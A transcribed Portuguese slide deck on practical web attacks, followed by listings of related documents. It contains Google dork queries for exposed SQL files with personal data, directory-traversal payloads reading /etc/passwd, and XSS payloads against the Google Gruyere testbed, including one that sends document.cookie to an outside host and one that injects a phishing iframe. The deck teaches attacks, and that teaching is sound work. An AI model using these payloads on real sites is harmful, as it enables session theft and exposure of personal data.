Ataques a Aplicações Web

Save this PDF as:
 WORD  PNG  TXT  JPG

Tamanho: px
Começar a partir da página:

Download "Ataques a Aplicações Web"

Transcrição

1 Ataques a Aplicações Web - Uma visão prática - Carlos Nilton A. Corrêa

2 Agenda 1. Panorama da (in)segurança web 2. Google hacking 3. SQL Injection 4. XSS 5. Um exemplo do dia-a-dia

3 Vulnerabilidades da web Fonte: Projeto OWASP

4 Information leakage? Consultas no Google! Podem equivaler a um nmap da web inurl:<domínio> ext:<extensão> <string> inurl:com.br ext:sql medico especialidade inurl:com.br ext:sql medico cpf

5 SQL Injection Ataque em que um formulário é preenchido com informações que interferem no fluxo de execução de consultas Frequentemente aplicado em etapas de login Geralmente, a seção de um sistema web onde há maior preocupação com segurança

6 Exemplo básico Isto: SELECT * FROM Bugs WHERE bug_id = $_GET['bugid']; Pode resultar nesta instrução! SELECT * FROM Bugs WHERE bug_id = 1234 OR TRUE;

7 Um caso pior! UPDATE Accounts SET password = SHA2('$password') WHERE account_id = $account_id; Vira... UPDATE Accounts SET password = SHA2( xyzzy ) WHERE account_id = 1234 OR TRUE

8 Directory traversal Tipo de ataque que faz com que uma aplicação web acesse um arquivo não-desejado Ocorre quanto um programa do tipo (geralmente um CGI) não trata adequadamente seus parâmetros de entrada Se um dos parâmetros indica um nome de arquivo, é possível manipulá-lo para que aponte para arquivos arbitrários no sistema do servidor

9 Exemplo básico (PHP/Linux) Suponha um script que suporte isto: jpg <?... /* le imagem a ser exibida */ arqimg = fopen( /amadoras/.$_get['arq'], r ); imagem = fread($handle, filesize($arqimg)); print $imagem; fclose($arqimg);?>

10 Imagine agora este acesso... /../../../../../../../../../etc/passwd

11 Directory traversal no Windows O caractere utilizado como separador de caminhos no Windows é \, o que de algum modo particulariza os ataques a esta plataforma Não obstante, cada vez mais APIs Windows têm suportado o caractere / em diretórios Uma vez que sistemas Windows não contam com uma árvore de diretórios unificada, ataques do tipo ficam restritos à partição em que os arquivos sendo servidos estiverem localizados

12 Variantes do ataque (1) Para evitar detecção por sistemas sensíveis a parâmetros que possuam caracteres como /, alguns ataques usam caminhos codificados Uma possibilidade é utilizar parâmetros com codificação de URL: seepic.cgi?arq=%2e%2e%2f... (../) seepic.cgi?arq=%2e%2e%5c... (..\)

13 Variantes do ataque (2) No passado, caracteres da plataforma Windows também podiam ser especificados por seu código Unicode Esta é uma codificação universal de 16 bits para representar símbolos em qualquer linguagem system32/cmd.exe?/c+dir+c:\ (%c0%af == '/') (%c1%9c == '\')

14 XSS Cross Site Scripting Através de um XSS, o Cracker injeta codigos JavaScript em um campo texto de uma página já existente e este JavaScript é apresentado para outros usuários. -- Wikipédia

15 XSRF (ou CSRF) Técnica em que o atacante se vale de informações de sessão previamente existentes no browser de um usuário para forjar requisições ou disparar ações nocivas Pode ser utilizado como parte de um ataque de XSS (cross-site scripting) Geralmente envolve algum tipo de engenharia social ou alguma forma de acesso à vítima

16 Google Gruyere Aplicação propositalmente desenvolvida com bugs Um testbed para experiências em segurança

17 Google Gruyere

18 Ataques orientados ao Gruyere Básicos Cadastrar um item com nome: zezi<a href="lalala">nho</a> Ou com o nome: <b>isto é um teste.</b><a href=" Ou ainda: <P class=dev>point your mouse <A onmouseover="alert('this is an alert box!')" href="">here</a></p>

19 Ataques orientados ao Gruyere Internet Explorer 9 (Ago/2011) <a href=" script>alert('segura PEAO')</script>">Este é o super novo queijo</a> <a href=" script>window.open(' cript>">este é o super novo queijo</a>

20 Ataques orientados ao Gruyere Começando a ficar sem-graça... <a href=" script>alert(document.cookie)</script>">este é o super novo queijo</a>

21 Ataques orientados ao Gruyere Fazendo algo desagradável... <a href=" tl?uid=<script>window.open(" odadosdoseubanco.com.br/salva.php?cook=" + document.cookie)</script>">este é o super novo queijo</a> Vejamos um exemplo de script para salvar dados...

22 Ataques orientados ao Gruyere Indo além do pedagógico! gtl?uid=%3ciframe%20src=%22http:// le.com.br%22%20width=%22100%%22%20height= %22100%%22%3E%3Cp%3EEntrar%20em%20contat o%20com%20o%20seu%20banco.%3c/p%3e%3c/if rame%3e

23 OPA!!! Será que isto tem a ver comigo??

24 Obrigado!! Carlos Nilton A. Corrêa

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nos últimos anos uma das vulnerabilidades mais exploradas por usuários mal-intencionados é a injeção de SQL, onde o atacante realiza uma

Leia mais

Segurança na WEB Ambiente WEB estático

Segurança na WEB Ambiente WEB estático Segurança de Redes Segurança na WEB Prof. Rodrigo Rocha prof.rodrigorocha@yahoo.com Servidor IIS Apache Cliente Browser IE FireFox Ambiente WEB estático 1 Ambiente Web Dinâmico Servidor Web Cliente Navegadores

Leia mais

Segurança em Web Aula 2

Segurança em Web Aula 2 Open Web Application Security Project Segurança em Web Aula 2 Maycon Maia Vitali ( 0ut0fBound ) maycon@hacknroll.com Hack n Roll Centro Universitário Vila Velha Agenda Revisão da Última Aula SQL Injection

Leia mais

13-10-2013. Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com

13-10-2013. Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com 13-10-2013 Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com Falha segurança Baco PerenBoom Cross-site scripting (XSS) e Logins por canal não seguro

Leia mais

Aplicação web protegida

Aplicação web protegida Sua aplicação web é segura? SEGURANÇA Aplicação web protegida Aplicações web oferecem grandes riscos à segurança. Aprenda a proteger todos os elementos dessa complexa equação. por Celio de Jesus Santos

Leia mais

XSS - CROSS-SITE SCRIPTING

XSS - CROSS-SITE SCRIPTING Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente

Leia mais

Top Ten OWASP. Fausto Levandoski 1. Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil. farole@gmail.

Top Ten OWASP. Fausto Levandoski 1. Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil. farole@gmail. Top Ten OWASP Fausto Levandoski 1 1 Universidade do Vale do Rios dos Sinos (UNISINOS) Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil farole@gmail.com Abstract.

Leia mais

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1 Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Quando se fala em segurança na WEB é preciso pensar inicialmente em duas frentes:

Leia mais

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados alexcamargoweb@gmail.com Sobre o professor Formação acadêmica: Bacharel

Leia mais

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos os ataques e suas respectivas

Leia mais

Segurança da Internet. Ricardo Terra (rterrabh [at] gmail.com) Segurança da Internet Outubro, 2013 2012 1

Segurança da Internet. Ricardo Terra (rterrabh [at] gmail.com) Segurança da Internet Outubro, 2013 2012 1 Segurança da Internet Ricardo Terra rterrabh [at] gmail.com Outubro, 2013 2012 1 CV Nome: Ricardo Terra Email: rterrabh [at] gmail.com www: ricardoterra.com.br Twitter: rterrabh Lattes: lattes.cnpq.br/

Leia mais

6 TESTES DE SEGURANÇA EM APLICAÇÕES WEB. 6.1 Comentários iniciais

6 TESTES DE SEGURANÇA EM APLICAÇÕES WEB. 6.1 Comentários iniciais 54 6 TESTES DE SEGURANÇA EM APLICAÇÕES WEB 6.1 Comentários iniciais Este capítulo em toda sua extensão tem como base o guia de testes da OWASP - OWASP Testing Guide Versão 3.0 (MEUCCI, 2008). Tem como

Leia mais

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos

Leia mais

Segurança em Sistemas Web. Addson A. Costa

Segurança em Sistemas Web. Addson A. Costa Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.

Leia mais

Ameaças, riscos e vulnerabilidades Cont. Objetivos

Ameaças, riscos e vulnerabilidades Cont. Objetivos Ameaças, riscos e vulnerabilidades Cont. Prof. Esp. Anderson Maia E-mail: tecnologo.maia@gmail.com Objetivos entender a definição dos termos hacker, cracker e engenharia social; compreender a anatomia

Leia mais

Prova de pré-requisito

Prova de pré-requisito Prova de pré-requisito PHP & MySQL: Técnicas para Web 2.0 1 - Qual das opções constrói a tabela abaixo: DIA MÊS ANO 28 04 1988 22 02 2002 a) b) c) dia mês ano

Leia mais

CLÍNICA TECNOLÓGICA CASOS DE TESTE. Palestrante: Marcia Silva MARCIA.SILVA@DATASUS.GOV.BR www.emersonrios.eti.br

CLÍNICA TECNOLÓGICA CASOS DE TESTE. Palestrante: Marcia Silva MARCIA.SILVA@DATASUS.GOV.BR www.emersonrios.eti.br CLÍNICA TECNOLÓGICA CASOS DE TESTE Palestrante: Marcia Silva MARCIA.SILVA@DATASUS.GOV.BR www.emersonrios.eti.br 1 REQUISITOS DE NEGÓCIO ESPECIFICAÇÃO FUNCIONAL Protótipo Planejamento dos testes Design

Leia mais

Sumário. Parte I Introdução 21. 1 Introdução 15 1.1 O Rails é ágil... 17 1.2 Explorando o conteúdo... 18 1.3 Agradecimentos... 19

Sumário. Parte I Introdução 21. 1 Introdução 15 1.1 O Rails é ágil... 17 1.2 Explorando o conteúdo... 18 1.3 Agradecimentos... 19 Sumário 1 Introdução 15 1.1 O Rails é ágil.......................................................... 17 1.2 Explorando o conteúdo................................................... 18 1.3 Agradecimentos........................................................

Leia mais

(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com

(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com (In)Segurança em Aplicações Web Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com Agenda Introdução Porque segurança em aplicações é prioridade? Principais causas de vulnerabilidades

Leia mais

Segurança Web com PHP 5

Segurança Web com PHP 5 Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos

Leia mais

Campus Party 2016 São Paulo, SP 27 de janeiro de 2016

Campus Party 2016 São Paulo, SP 27 de janeiro de 2016 Campus Party 2016 São Paulo, SP 27 de janeiro de 2016 WORKSHOP: Programação segura para WEB Dionathan Nakamura nakamura@cert.br Agenda 14:15 16:00 10-20 min: configuração inicial 30-45 min: parte teórica

Leia mais

Manual de Instalação do e.sic - Sistema Municipal de Informações ao Cidadão

Manual de Instalação do e.sic - Sistema Municipal de Informações ao Cidadão Manual de Instalação do e.sic - Sistema Municipal de Informações ao Cidadão Companhia de Processamento de Dados do Estado de São Paulo DDS Diretoria de Desenvolvimento de Sistemas SDS Superintendência

Leia mais

... MANUAL DO MODERADOR SERVIÇOS DE WEB

... MANUAL DO MODERADOR SERVIÇOS DE WEB ... MANUAL DO MODERADOR SERVIÇOS DE WEB ÍNDICE 1. IMPLEMENTAÇÃO 4 1.1 PAINEL DE CONTROLE 4 1.2 SENHA 4 1.3 INSTALAÇÃO 4 1.3.1 INSTALAÇÃO PARA MODERADOR 4 1.3.2 INSTALAÇÃO PARA PARTICIPANTES 8 1.3.2.1 PELO

Leia mais

Banco de Dados Oracle 10g: Introdução à Linguagem SQL

Banco de Dados Oracle 10g: Introdução à Linguagem SQL Oracle University Entre em contato: 0800 891 6502 Banco de Dados Oracle 10g: Introdução à Linguagem SQL Duração: 5 Dias Objetivos do Curso Esta classe se aplica aos usuários do Banco de Dados Oracle8i,

Leia mais

Penetration Testing Workshop

Penetration Testing Workshop Penetration Testing Workshop Information Security FCUL 9 Maio 2013 Workshop FCUL Marco Vaz, CISSP, CISA, ISO27001LA, ITILv3 Expert Consultant Partner (mv@integrity.pt) Herman Duarte, OSCP, Associate CISSP,

Leia mais

Linguagem de. Aula 06. Profa Cristiane Koehler cristiane.koehler@canoas.ifrs.edu.br

Linguagem de. Aula 06. Profa Cristiane Koehler cristiane.koehler@canoas.ifrs.edu.br Linguagem de Programação IV -PHP Aula 06 Profa Cristiane Koehler cristiane.koehler@canoas.ifrs.edu.br Criação de Formulários o Um formulário consiste em uma série de campos que são preenchidos pelo usuário

Leia mais

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia.

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia. Explorando e tratando a falha de Cross-site-scripting (XSS) 1 D E D E Z E M B R O D E 2 0 1 5 Muito pouco falada e com alto nível crítico dentro das vulnerabilidades relatadas, o Cross-site-scripting (XSS)

Leia mais

Manual do SISC Sistema de Informações do Serviço de Convivência e Fortalecimento de Vínculos Perfil Gestor Estadual Abril/2014 Versão 1.

Manual do SISC Sistema de Informações do Serviço de Convivência e Fortalecimento de Vínculos Perfil Gestor Estadual Abril/2014 Versão 1. Manual do SISC Sistema de Informações do Serviço de Convivência e Fortalecimento de Vínculos Perfil Gestor Estadual Abril/2014 Versão 1.0 SUMÁRIO Manual do SISC... 3 1. Finalidade do SISC... 3 2. Requisitos

Leia mais

Treinamento. "Contra defesa cibernética Teoria e Prática" Preparado por: Eduardo Bernuy Lopes Consultor Sênior red.safe ISO 27001 Lead Auditor

Treinamento. Contra defesa cibernética Teoria e Prática Preparado por: Eduardo Bernuy Lopes Consultor Sênior red.safe ISO 27001 Lead Auditor Treinamento "Contra defesa cibernética Teoria e Prática" Preparado por: Eduardo Bernuy Lopes Consultor Sênior red.safe ISO 27001 Lead Auditor 1 Informações do Curso Data: A definir (Em breve); Material

Leia mais

Pronto! Todos os instaladores correspondentes do filtro aplicado no passo 4 serão disponibilizados para download.

Pronto! Todos os instaladores correspondentes do filtro aplicado no passo 4 serão disponibilizados para download. Painel de Chamadas Produto : Corpore RM TOTVS Hospitalar Chamado : R_SAU002\REQ024 Data da publicação : 16/07/15 País(es) : Brasil Banco(s) de Dados : POAD0005/SAUDEJOJI (SQL) POAD0005/HPD (Oracle) Melhoria

Leia mais

Segurança em aplicações Web. Exemplos e Casos Práticos em

Segurança em aplicações Web. Exemplos e Casos Práticos em Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST 7º Ciclo de Apresentações. 28/Março/2007 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header

Leia mais

Disciplina de Segurança e Auditoria de Sistemas Ataques

Disciplina de Segurança e Auditoria de Sistemas Ataques Disciplina de Segurança e Auditoria de Sistemas Ataques Professor: Jiyan Yari Ataques mais comuns: Footprinting - tarefa de coletar informações sobre um sistema alvo; - feita por vias tradicionais e públicas,

Leia mais

Segurança Informática e nas Organizações. Guiões das Aulas Práticas

Segurança Informática e nas Organizações. Guiões das Aulas Práticas Segurança Informática e nas Organizações Guiões das Aulas Práticas André Zúquete 1 e Hélder Gomes 2 1 Departamento de Eletrónica, Telecomunicações e Informática 2 Escola Superior de Tecnologia e Gestão

Leia mais

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Prof. Hederson Velasco Ramos Uma boa maneira de analisar ameaças no nível dos aplicativo é organiza las por categoria de

Leia mais

Recomendações de Segurança para Desenvolvimento de Aplicações Web

Recomendações de Segurança para Desenvolvimento de Aplicações Web Recomendações de Segurança para Desenvolvimento de Aplicações Web Índice 1. INTRODUÇÃO...3 1.1 CONTROLE DE VERSÃO...3 1.2 OBJETIVO...3 1.3 PÚBLICO - ALVO...4 2 VULNERABILIDADES COMUNS...4 2.1 INJEÇÃO DE

Leia mais

Tutorial de Acesso ao AVA - Ambiente Virtual de Aprendizagem e-learning Consinco. Agosto 2015, versão 1

Tutorial de Acesso ao AVA - Ambiente Virtual de Aprendizagem e-learning Consinco. Agosto 2015, versão 1 Tutorial de Acesso ao AVA - Ambiente Virtual de Aprendizagem e-learning Consinco Agosto 2015, versão 1 Consinco e-learning O Que é? Como Acessar? O Consinco e-learning é o portal de Ensino a Distância

Leia mais

segurança em aplicações web

segurança em aplicações web segurança em aplicações web myke hamada mykesh gmail 1 whoami ciência da computação segurança da informação ruby rails c# vbscript opensource microsoft ethical hacking 2 agenda introdução ontem e

Leia mais

Inserindo e Listando registros

Inserindo e Listando registros Inserindo e Listando registros Dando prosseguimento à aula anterior, agora precisaremos construir uma rotina que faça a inserção no banco de dados Escola. A ação agora é inserir o aluno na tabela alunos

Leia mais

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão;

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão; initsec Proposta de pentest 1. O que é? Pentest (Penetration Test) é uma avaliação de maneira realista da segurança empregada em aplicações web e infraestruturas de TI no geral. O Pentest constitui da

Leia mais

DWEB. Design para Web. HTML5 - Marcação de formulário. Curso Superior de Tecnologia em Design Gráfico

DWEB. Design para Web. HTML5 - Marcação de formulário. Curso Superior de Tecnologia em Design Gráfico DWEB Design para Web Curso Superior de Tecnologia em Design Gráfico HTML5 - Marcação de formulário E não vos conformeis com este século, mas transformai-vos pela renovação da vossa mente, para que experimenteis

Leia mais

Segurança da Informação:

Segurança da Informação: Segurança da Informação: Tratando dados em PHP Objetivo: O objetivo desta palestra é demonstrar os riscos inerentes de se trabalhar com informações externas à aplicações desenvolvidas em PHP, como o descuido

Leia mais

Análise de Vulnerabilidades em Aplicações WEB

Análise de Vulnerabilidades em Aplicações WEB Análise de Vulnerabilidades em Aplicações WEB Apresentação Luiz Vieira Construtor 4Linux Analista e Consultor de Segurança 15 anos de experiência em TI Pen-Tester Articulista sobre Segurança de vários

Leia mais

País(es) : Brasil Banco(s) de Dados : Sql Server / Oracle

País(es) : Brasil Banco(s) de Dados : Sql Server / Oracle Solicitação de Prontuários no Controle de Documentos Produto : RM Saúde / Controle de Documentos Chamado : R_SAU002/REQ028 Data da publicação : 10/09/14 País(es) : Brasil Banco(s) de Dados : Sql Server

Leia mais

www.coldfusionbrasil.com.br

www.coldfusionbrasil.com.br www.coldfusionbrasil.com.br 2000 1 O que é Cold Fusion? 3 Arquitetura Cold Fusion 3 Cold Fusion Markup Language (CFML) 4 O que devo saber para programar em CFML? 4 HTML 4 Desenho de Banco de Dados Relacionais

Leia mais

MANUAL DE NOTÍCIAS NO PORTAL DA PBH

MANUAL DE NOTÍCIAS NO PORTAL DA PBH MANUAL PUBLICAÇÃO DE NOTÍCIAS NO PORTAL DA PBH Instruções para publicação de notícias no Portal PBH 1 Efetuando o acesso Para efetuar o login, acessar o endereço: www.pbh.gov.br/comunicacao/login ou https://ecp.pbh.gov.br/ecp

Leia mais

DESENVOLVIMENTODE APLICAÇÕESPARAINTERNET:PHP. VitorFariasCoreia

DESENVOLVIMENTODE APLICAÇÕESPARAINTERNET:PHP. VitorFariasCoreia DESENVOLVIMENTODE APLICAÇÕESPARAINTERNET:PHP VitorFariasCoreia INFORMAÇÃOECOMUNICAÇÃO Autor Vitor Farias Correia Graduado em Sistemas de Informação pela FACITEC e especialista em desenvolvimento de jogos

Leia mais

Patrocinadores. Microsoft TechDays 2007 - Lisboa. DEV013 0wn3d: Hacking ainda mais fácil em AJAX Web Sites

Patrocinadores. Microsoft TechDays 2007 - Lisboa. DEV013 0wn3d: Hacking ainda mais fácil em AJAX Web Sites DEV013 0wn3d: Hacking ainda mais fácil em AJAX Web Sites Rui Quintino rui.quintino@devscope.net Arquitecto Software, DevScope Patrocinadores DEV013 0wn3d: Hacking ainda mais fácil em AJAX Web Sites? Rui

Leia mais

Encontrando falhas em aplicações web baseadas em flash. Wagner Elias Gerente de Pesquisa e Desenvolvimento Conviso IT Security

Encontrando falhas em aplicações web baseadas em flash. Wagner Elias Gerente de Pesquisa e Desenvolvimento Conviso IT Security Encontrando falhas em aplicações web baseadas em flash Wagner Elias Gerente de Pesquisa e Desenvolvimento Conviso IT Security Tópicos Um pouco sobre flash Vulnerabilidades Como fazer direito Conclusões

Leia mais

HTML Página 1. Índice

HTML Página 1. Índice PARTE - 1 HTML Página 1 Índice HTML A HISTÓRIA... 2 O COMEÇO E A INTEROPERABILIADE... 3 Primeira Página... 4 Entendendo seu código... 5 Abrindo o código fonte da sua página... 6 Comentários na página...

Leia mais

LÓGICA DE PROGRAMAÇÃO. Professor Celso Masotti http://ead.celsomasotti.com.br

LÓGICA DE PROGRAMAÇÃO. Professor Celso Masotti http://ead.celsomasotti.com.br LÓGICA DE PROGRAMAÇÃO Professor Celso Masotti http://ead.celsomasotti.com.br Ano: 2015 1 HTML & PHP em Ambiente Web PARTE II Sumário I Decisão... 4 Operadores de Comparação... 6 II IF ELSEIF ELSE... 7

Leia mais

Aula 11 Integrando Segurança ao Processo de Desenvolvimento de Software. Prof. Leonardo Lemes Fagundes

Aula 11 Integrando Segurança ao Processo de Desenvolvimento de Software. Prof. Leonardo Lemes Fagundes Aula 11 Integrando Segurança ao Processo de Desenvolvimento de Software Prof. Leonardo Lemes Fagundes A educação faz com que as pessoas sejam fáceis de guiar, mas difíceis de arrastar; fáceis de governar,

Leia mais

Biblioteca de segurança para tratar as principais vulnerabilidades web

Biblioteca de segurança para tratar as principais vulnerabilidades web Biblioteca de segurança para tratar as principais vulnerabilidades web Tarcizio Vieira Neto DIOPE/COGSI/SISEC/SIDES Líder em soluções de TI para governo Apresentação pessoal Tarcizio Vieira Neto 4 anos

Leia mais

Instituto Siegen Manual do Professor

Instituto Siegen Manual do Professor Manual do Professor - www.institutosiegen.com.br - 1 Instituto Siegen Manual do Professor Manual do Professor - www.institutosiegen.com.br - 2 Sumário Instituto Siegen...1 Manual do Professor...1 Funcionamento

Leia mais

PÓS-GRADUAÇÃO EM MATEMÁTICA COMPUTACIONAL INFORMÁTICA INSTRUMENTAL Aula 06: Introdução Linguagem HTML

PÓS-GRADUAÇÃO EM MATEMÁTICA COMPUTACIONAL INFORMÁTICA INSTRUMENTAL Aula 06: Introdução Linguagem HTML PÓS-GRADUAÇÃO EM MATEMÁTICA COMPUTACIONAL INFORMÁTICA INSTRUMENTAL Aula 06: Introdução Linguagem HTML O Desenvolvimento Web O desenvolvimento web é o termo utilizado para descrever atividade relacionada

Leia mais

Jaspe versão 1.2. Manual do usuário Versão em Português

Jaspe versão 1.2. Manual do usuário Versão em Português Jaspe versão 1.2 Manual do usuário Versão em Português Iniciando o Jaspe Ao iniciar o Jaspe, será aberta uma janela de identificação de usuário. Se for a primeira vez que você estiver iniciando o Jaspe,

Leia mais

PEDIDOS WEB MANUAL DO USUÁRIO

PEDIDOS WEB MANUAL DO USUÁRIO PEDIDOS WEB MANUAL DO USUÁRIO CONTEÚDO Sobre o site... 2 Segurança -Trocar Senha... 4 Segurança Cadastrarusuários... 5 Configurações Preços... 6 Configurações Dados de Contato... 7 Configurações Assinatura

Leia mais

Sumário. Acessando a Sala Virtual...3. Acessando a Disciplina...3. Boxes Laterais...4. Usuários...4. Mensagens...5. Usuários Online...

Sumário. Acessando a Sala Virtual...3. Acessando a Disciplina...3. Boxes Laterais...4. Usuários...4. Mensagens...5. Usuários Online... Sumário Acessando a Sala Virtual...3 Acessando a Disciplina...3 Boxes Laterais...4 Usuários...4 Mensagens...5 Usuários Online...6 Suporte Técnico...6 Tutores Online...6 Calendário...6 Buscar nos Fóruns...7

Leia mais

MINISTÉRIO DA EDUCAÇÃO INSTITUTO FEDERAL DE EDUCAÇÃO, CIÊNCIA E TECNOLOGIA DO PIAUÍ - IFPI CAMPUS FLORIANO

MINISTÉRIO DA EDUCAÇÃO INSTITUTO FEDERAL DE EDUCAÇÃO, CIÊNCIA E TECNOLOGIA DO PIAUÍ - IFPI CAMPUS FLORIANO MINISTÉRIO DA EDUCAÇÃO INSTITUTO FEDERAL DE EDUCAÇÃO, CIÊNCIA E TECNOLOGIA DO PIAUÍ - IFPI CAMPUS FLORIANO EDITAL Nº 003/2016, DE 14 DE JANEIRO DE 2016 Seleção para Alunos de Pós-Graduação Lato Sensu para

Leia mais

Usando o NVU Parte 2: Inserindo imagens

Usando o NVU Parte 2: Inserindo imagens Usando o NVU Parte 2: Inserindo imagens Simão Pedro P. Marinho Para uso exclusivo por alunos da PUC Minas Inserindo uma imagem que está no seu computador Inserindo uma imagem que já está na Internet Inserindo

Leia mais

1 SQL Injection A consulta normal SQL seria:

1 SQL Injection A consulta normal SQL seria: HTTP Testando aplicação Web. Pegaremos dois tipos de ataques dentre os top 10 do OWASP 1 SQL Injection A consulta normal SQL seria: SELECT * FROM Users WHERE Username='$username' AND Password='$password'

Leia mais

Construindo uma aplicação PHP à Prova de Balas

Construindo uma aplicação PHP à Prova de Balas Construindo uma aplicação PHP à Prova de Balas Rafael Jaques FISL 11 - Porto Alegre - 24/07/10 Buscai primeiro o reino do Senhor e a sua justiça, e todas as demais coisas vos serão acrescentadas (Mateus

Leia mais

Orientações para Usuários

Orientações para Usuários Sistema de Gestão de Certificados Eletrônicos Orientações para Usuários Organizadores de evento Controladores de qualidade Objetivos do Sistema Os principais objetivos da concepção do sistema são: automatização,

Leia mais

Instituto de Inovação com TIC. [Junho/ 2009]

Instituto de Inovação com TIC. [Junho/ 2009] Instituto de Inovação com TIC [Junho/ 2009] Segurança em aplicações WEB: A nova fronteira rodrigo.assad@cesar.org.br Redes de Computadores (Histórico) Segurança de Redes (Histórico) Robert Tappan

Leia mais

4 Desenvolvimento da ferramenta

4 Desenvolvimento da ferramenta direcionados por comportamento 38 4 Desenvolvimento da ferramenta Visando facilitar a tarefa de documentar requisitos funcionais e de gerar testes automáticos em uma única ferramenta para proporcionar

Leia mais

Segurança Informática e nas Organizações. Guiões das Aulas Práticas

Segurança Informática e nas Organizações. Guiões das Aulas Práticas Segurança Informática e nas Organizações Guiões das Aulas Práticas André Zúquete 1 e Hélder Gomes 2 1 Departamento de Eletrónica, Telecomunicações e Informática 2 Escola Superior de Tecnologia e Gestão

Leia mais

Manual Corrigindo Erros de Conexão SQL Server. FullCopyConvert Data

Manual Corrigindo Erros de Conexão SQL Server. FullCopyConvert Data Manual Corrigindo Erros de Conexão SQL Server. FullCopyConvert Data Revisão: Janeiro / 2014 Sumário Bem-vindo ao FullCopyConvert Data! Estas instruções irão guiá-lo para identificar e corrigir erros de

Leia mais

Descrição de Ataques XSS em servidores Web

Descrição de Ataques XSS em servidores Web ABSTRACT Descrição de Ataques XSS em servidores Web Leonardo Santos Silva São Paulo, Brasil Com a proliferação de sítios web e a incapacidade dos desenvolvedores em manter um código atualizado contra os

Leia mais

Manual do Usuário - Cliente Externo

Manual do Usuário - Cliente Externo Versão 3.0 SGCL - Sistema de Gestão de Conteúdo Local SUMÁRIO 1. INTRODUÇÃO... 4 1.1. Referências... 4 2. COMO ESTÁ ORGANIZADO O MANUAL... 4 3. FUNCIONALIDADES GERAIS DO SISTEMA... 5 3.1. Acessar a Central

Leia mais

Tutorial do Site das Escolas

Tutorial do Site das Escolas SECRETARIA DE ESTADO DA EDUCAÇÃO SEED SUPERINTENDÊNCIA DE ESTADO DA EDUCAÇÃO SUED - DITEC - CAUTEC Tutorial do Site das Escolas SECRETARIA DE ESTADO DA EDUCAÇÃO DO PARANÁ Maurício Requião de Mello e Silva

Leia mais

Ementa Completa. Introdução

Ementa Completa. Introdução Ementa Completa Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades Autorização Non-Disclosure

Leia mais

INDEX. Mapas Culturais

INDEX. Mapas Culturais Mapas Culturais INDEX Mapas Culturais Cadastrar agentes 13 Cadastrar espaços 28 Cadastrar projetos 38 Cadastrar eventos 48 Gestores e hierarquias 60 _Sobre Mapas Culturais A prefeitura de São Paulo e o

Leia mais

Manual do Usuário Janeiro de 2016

Manual do Usuário Janeiro de 2016 Manual do Usuário Janeiro de 2016 SOBRE CMX CMX é uma interface que dá acesso aos estudantes a milhares de atividades, exercícios e recursos todos posicionados com os padrões e conceitos curriculares.

Leia mais

Boas Práticas de Desenvolvimento Seguro

